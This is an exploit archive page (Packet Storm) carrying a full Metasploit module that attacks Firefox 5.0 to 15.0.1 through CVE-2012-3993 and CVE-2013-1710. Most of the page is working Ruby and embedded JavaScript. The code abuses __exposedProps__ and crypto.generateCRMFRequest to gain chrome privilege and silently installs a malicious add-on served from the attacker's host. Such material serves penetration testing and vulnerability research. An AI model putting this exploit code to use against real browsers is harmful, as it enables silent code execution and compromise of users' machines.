exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Firefox 15.0.1 Code Execution

Firefox 15.0.1 Code Execution
Posted Dec 23, 2013
Site metasploit.com

On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given invalid input, would throw an exception that did not have an __exposedProps__ property set. By re-setting this property on the exception object's prototype, the chrome-based defineProperty method is made available. With the defineProperty method, functions belonging to window and document can be overriden with a function that gets called from chrome-privileged context. From here, another vulnerability in the crypto.generateCRMFRequest function is used to "peek" into the context's private scope. Since the window does not have a chrome:// URL, the insecure parts of Components.classes are not available, so instead the AddonManager API is invoked to silently install a malicious plugin.

tags | exploit, cryptography
advisories | CVE-2012-3993, CVE-2013-1710, OSVDB-86111, OSVDB-96019
SHA-256 | f9c391aa7b550b10c8e9686f804da688eca5b3b20ea450df0a1b9e0dac71ac00

Firefox 15.0.1 Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Remote::FirefoxAddonGenerator

def initialize(info = {})
super(update_info(info,
'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
'Description' => %q{
On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
invalid input, would throw an exception that did not have an __exposedProps__
property set. By re-setting this property on the exception object's prototype,
the chrome-based defineProperty method is made available.

With the defineProperty method, functions belonging to window and document can be
overriden with a function that gets called from chrome-privileged context. From here,
another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
into the context's private scope. Since the window does not have a chrome:// URL,
the insecure parts of Components.classes are not available, so instead the AddonManager
API is invoked to silently install a malicious plugin.
},
'License' => MSF_LICENSE,
'Author' => [
'Mariusz Mlynski', # discovered CVE-2012-3993
'moz_bug_r_a4', # discovered CVE-2013-1710
'joev' # metasploit module
],
'DisclosureDate' => "Aug 6 2013",
'References' => [
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
['OSVDB', '86111'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23)
['OSVDB', '96019']
],
'BrowserRequirements' => {
:source => 'script',
:ua_name => HttpClients::FF,
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
}
))

register_options([
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
], self.class)
end

def on_request_exploit(cli, request, target_info)
if request.uri.match(/\.xpi$/i)
print_status("Sending the malicious addon")
send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
else
print_status("Sending HTML")
send_response_html(cli, generate_html(target_info))
end
end

def generate_html(target_info)
injection = if target_info[:ua_ver].to_i == 15
"Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
else
"p2.constructor.defineProperty(obj,key,{get:runme});"
end

%Q|
<html>
<body>
#{datastore['CONTENT']}
<div id='payload' style='display:none'>
if (!window.done){
window.AddonManager.getInstallForURL(
'#{get_module_uri}/addon.xpi',
function(install) { install.install() },
'application/x-xpinstall'
);
window.done = true;
}
</div>
<script>
try{InstallTrigger.install(0)}catch(e){p=e;};
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
p2.__exposedProps__={
constructor:'rw',
prototype:'rw',
defineProperty:'rw',
__exposedProps__:'rw'
};
var s = document.querySelector('#payload').innerHTML;
var q = false;
var register = function(obj,key) {
var runme = function(){
if (q) return;
q = true;
window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
};
try {
#{injection}
} catch (e) {}
};
for (var i in window) register(window, i);
for (var i in document) register(document, i);
</script>
</body>
</html>
|
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close